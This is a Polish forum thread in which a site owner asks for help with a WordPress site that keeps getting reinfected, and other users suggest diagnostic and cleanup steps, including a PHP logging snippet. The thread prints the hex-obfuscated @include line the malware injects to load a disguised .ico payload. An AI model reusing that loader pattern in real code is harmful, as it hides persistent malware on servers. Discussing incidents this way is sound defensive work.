Wordpress - ciągła infekcja pomysły?

[stania.info]

Witam,
Na wstępie zaznaczę, ża art-ów o bezpieczeństwie wp przeczytałem dziesiątki.

 

Problem dotyczy jednej z domen z Wordpressem

• prosta strona kilkanaście wpisów
• wordpress aktualny (aktualizowany na bieżąco) 4.9
• theme - darmowa skórka pobrana z repozytorium wp
• z dodatkowych wtyczek WP Slick Slider (aktualizowany jak tylko wyskoczy powiadomienie)
• rest API odłączone
• xmlrpc odłączone
• w logach nie znalazłem podejrzanych zapytań POST

 

Co kilka dni wraca mi infekcja, która dopisuje do plików *.php  (przez co admin odłącza mnie - wysyłany spam przez smtp ) mniej więcej podobny kod atakuje wszystkie pliki na serwerze.

/*5a4b5*/

@include "\x2fhome\x2fstan\x69apl/\x64omai\x6es/do\x33razy\x73ztuk\x61.pl/\x70ubli\x63_htm\x6c/wp-\x69nclu\x64es/i\x6dages\x2fwlw/\x66avic\x6fn_e0\x3787e.\x69co";

/*5a4b5*/

Oczyszczanie ręczne (po skanowaniu plików) nic nie daje, problem wracał po kilku dniach.

Wywaliłem wszystko, nowa czysta instalacja WP,  baza sprawdzona pod kontem dziwnych wpisów (brak ukrytego usera, do postów/stron - nie ma doklejonego JS)

Po kilku dniach infekcja wraca - opadam z sił czy może ktoś ma podobny problem?

 

[odys]

Jeśli nie CMS, to zostaje hosting (bardziej prawdopodobne) ewentualnie maszyna na której działasz (mniej prawdopodobne).

Używasz jakiegoś klienta FTP? Też go sprawdź

[jimmi]

może gdzieś być jeszcze jakiś backdoor  gdzieś albo np. coś takiego

https://github.com/alexantr/filemanager

a masz na tym koncie jeszcze coś? może to chodzić po całym koncie

[kayman]

Cytat

https://malwaredecoder.com/result/cb043394f33cefb8b933aa00bda8bf9f

 

 

[stania.info]

9 godzin temu, odys napisał:

Jeśli nie CMS, to zostaje hosting (bardziej prawdopodobne) ewentualnie maszyna na której działasz (mniej prawdopodobne).

Używasz jakiegoś klienta FTP? Też go sprawdź

Używam zawsze aktualnej wersji FileZilla infekcja zaczęła się na linuxpl -> czysta instalacja na innym serwerze po kilku dniach znowu infekcja.

@kayman  Dzięki wiem co jest includowane, te pseudo pliki .ico usunięte powracają jak bumerank - nie wiem czemu.

Oczywiście hosting twierdzi, że z ich strony jest wszystko OK.

 

[jimmi]

@stania.info  jak to jest jeden tylko plik to zostaw pod tą nazwą jakiś bezpieczny plik... np.. z paroma enterami czy coś.
jak dla mnie masz coś dziurawego pewnie wtyczka lub tempate.

zainstaluj jakiś wordfence czy coś takiego.

[kayman]

2 godziny temu, stania.info napisał:

nie wiem czemu

zobacz jakimś notatnikiem co jest w favicon_e0787e.ico, jeżeli kod jest zaciemniony jak ta ścieżka to wiesz co zrobić

[stania.info]

Zawartość pliku .ico

https://malwaredecoder.com/result/6f65cb1d32a8f507d6f1f7d9428f46e0

 

[mamoczy]

Zobacz czy w bazie danych nie siedzi furteczka.

 

Można również przeskanować konto "mogulem" od Yandexa

[stania.info]

7 minut temu, mamoczy napisał:

Zobacz czy w bazie danych nie siedzi furteczka.

Bazę przeglądam, nic podejrzanego nie widać, nie ma dodatkowych user-ów, do postów nie doklejono js ani kodu php

 

[jimmi]

a wszystkie pliki są czyszczone? jak widzę to podmienia sporo plików.

jak dla mnie weksportować posty.

postawić od nowa wp na czystej bazie zaimportować tylko wpisy.

zabezpieczyć wp.

[kayman]

1 godzinę temu, stania.info napisał:

Zawartość pliku .ico

teraz w pliku favicon_e0787e.ico  zamiast tego kodu co jest wstaw kod do tworzący loga np

<?php 

$fp = fopen('mallwarelog.txt', 'w');
fwrite($fp, $_SERVER['REQUEST_URI'].PHP_EOL); // to jest twoja dziura
fwrite($fp, serialize($_POST).PHP_EOL); // to do przejrzenia
fwrite($fp, serialize($_GET).PHP_EOL); // to do przejrzenia
fclose($fp);
exit();

 jak się pojawi plik mallwarelog.txt będziesz wiedział co i jak

[stania.info]

Za wiele informacji nie dostarczył log

/
a:0:{}
a:0:{}

mimo wszystko dziękuję za zaangażowanie

[kayman]

9 minut temu, stania.info napisał:

Za wiele informacji nie dostarczył log

bo to twoje wejście jest, poczekajmy na jego jak będzie chciał spamować

e:/ oglądaj ten plik od czasu do czasu

[stania.info]

Czyli polecasz zostawić tego includa w indexie?